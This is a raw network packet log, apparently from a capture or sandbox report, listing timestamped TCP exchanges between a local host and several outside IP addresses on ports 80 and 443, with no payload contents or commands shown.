Nov 7, 2024 07:33:23.416640043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.416650057 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.416693926 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.416752100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.416860104 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.416877031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.416887045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.416893959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.416904926 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.416924000 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.416934013 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.417078972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.417115927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.418870926 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.418927908 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.418934107 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.418941021 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.418981075 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.418984890 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.419069052 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.419101000 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.419142008 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.419147015 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.419186115 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.419914961 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.431082010 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.431126118 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.431174040 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.431183100 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.431216955 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.432871103 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.437905073 CET	49891	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.437918901 CET	443	49891	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.438016891 CET	49891	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.438451052 CET	49891	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.438462019 CET	443	49891	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.438608885 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.438657045 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.438663006 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.439349890 CET	443	49883	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.439407110 CET	443	49883	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.439523935 CET	49883	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.445239067 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.445282936 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.445288897 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.450638056 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.450709105 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.450714111 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.456090927 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.456442118 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.456446886 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.459100008 CET	443	49884	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.459120035 CET	443	49884	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.459152937 CET	443	49884	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.459167957 CET	49884	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.459201097 CET	49884	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.460869074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.460906982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.460953951 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.461771965 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.461822987 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.461827993 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.467384100 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.467421055 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.467431068 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.483695030 CET	49883	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.483704090 CET	443	49883	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.490170002 CET	49884	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.490175009 CET	443	49884	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.497931004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.497978926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.497982979 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.497989893 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498023987 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.498039961 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.498150110 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498159885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498169899 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498181105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498193979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498203039 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.498235941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.498501062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498512030 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498548985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.498677969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498687983 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498697996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498709917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498722076 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.498735905 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.498758078 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.499113083 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499124050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499140024 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499155045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499166012 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.499171972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499186993 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499187946 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.499212980 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.499236107 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.499775887 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499790907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499800920 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499811888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499819994 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.499823093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499835014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499846935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499852896 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.499860048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.499891043 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.499907970 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.500565052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.500575066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.500586033 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.500597954 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.500608921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.500613928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.500624895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.500637054 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.500646114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.500650883 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.500658989 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.500678062 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.500689030 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.500734091 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.501509905 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.501522064 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.501530886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.501548052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.501559019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.501569986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.501574039 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.501581907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.501591921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.501601934 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.501602888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.501611948 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.501631021 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.502372980 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.502384901 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.502429008 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.502939939 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.502979994 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.503010988 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.503017902 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.503052950 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.503056049 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.503062010 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.503102064 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.503106117 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.521032095 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.521189928 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.522794008 CET	49892	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.522806883 CET	443	49892	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.522891045 CET	49892	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.536096096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536154032 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.536159039 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536174059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536196947 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.536209106 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.536324978 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536335945 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536345005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536355972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536372900 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.536410093 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.536725044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536735058 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536745071 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536756039 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536766052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.536766052 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.536798954 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.580533028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.580547094 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.580615044 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.596982956 CET	49892	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.596993923 CET	443	49892	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.617760897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.617805958 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.617815971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.617825985 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.617863894 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.618042946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618052959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618089914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618093014 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.618103027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618128061 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.618155003 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.618499994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618511915 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618521929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618544102 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.618570089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.618746042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618757010 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618767977 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618792057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.618810892 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.618818045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618829012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618838072 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618849039 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618860960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.618861914 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.618880033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.618902922 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.619702101 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.619716883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.619730949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.619745970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.619756937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.619760036 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.619774103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.619775057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.619788885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.619801998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.619811058 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.619818926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.619831085 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.619854927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.620649099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.620663881 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.620676994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.620692968 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.620697021 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.620707989 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.620717049 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.620722055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.620743036 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.620747089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.620763063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.620770931 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.620778084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.620800972 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.620826960 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.621531010 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.621548891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.621560097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.621571064 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.621583939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.621592999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.621599913 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.621609926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.621622086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.621637106 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.621649981 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.621679068 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.622423887 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.622436047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.622446060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.622458935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.622486115 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.622529030 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.655740976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.655818939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.655834913 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.655844927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.655874014 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.655926943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.656023026 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.656025887 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.656038046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.656065941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.656081915 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.656313896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.656325102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.656336069 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.656352997 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.656356096 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.656363010 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.656394005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.656410933 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.657079935 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.657094955 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.700407028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.700418949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.700459957 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.737246990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737258911 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737271070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737315893 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.737513065 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737528086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737540960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737551928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737574100 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.737595081 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.737799883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737838984 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.737884045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737895012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737905979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737917900 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737921953 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.737929106 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737941027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.737955093 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.737977982 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.738406897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.738446951 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.738593102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.738601923 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.738610983 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.738621950 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.738632917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.738643885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.738656044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.738656998 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.738667011 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.738677025 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.738677979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.738688946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.738693953 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.738711119 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.738729000 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.739495993 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.739505053 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.739515066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.739526033 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.739536047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.739542007 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.739546061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.739556074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.739564896 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.739567995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.739578009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.739588022 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.739597082 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.739599943 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.739620924 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.739641905 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.740484953 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.740498066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.740511894 CET	80	49882	185.215.113.16	192.168.2.4
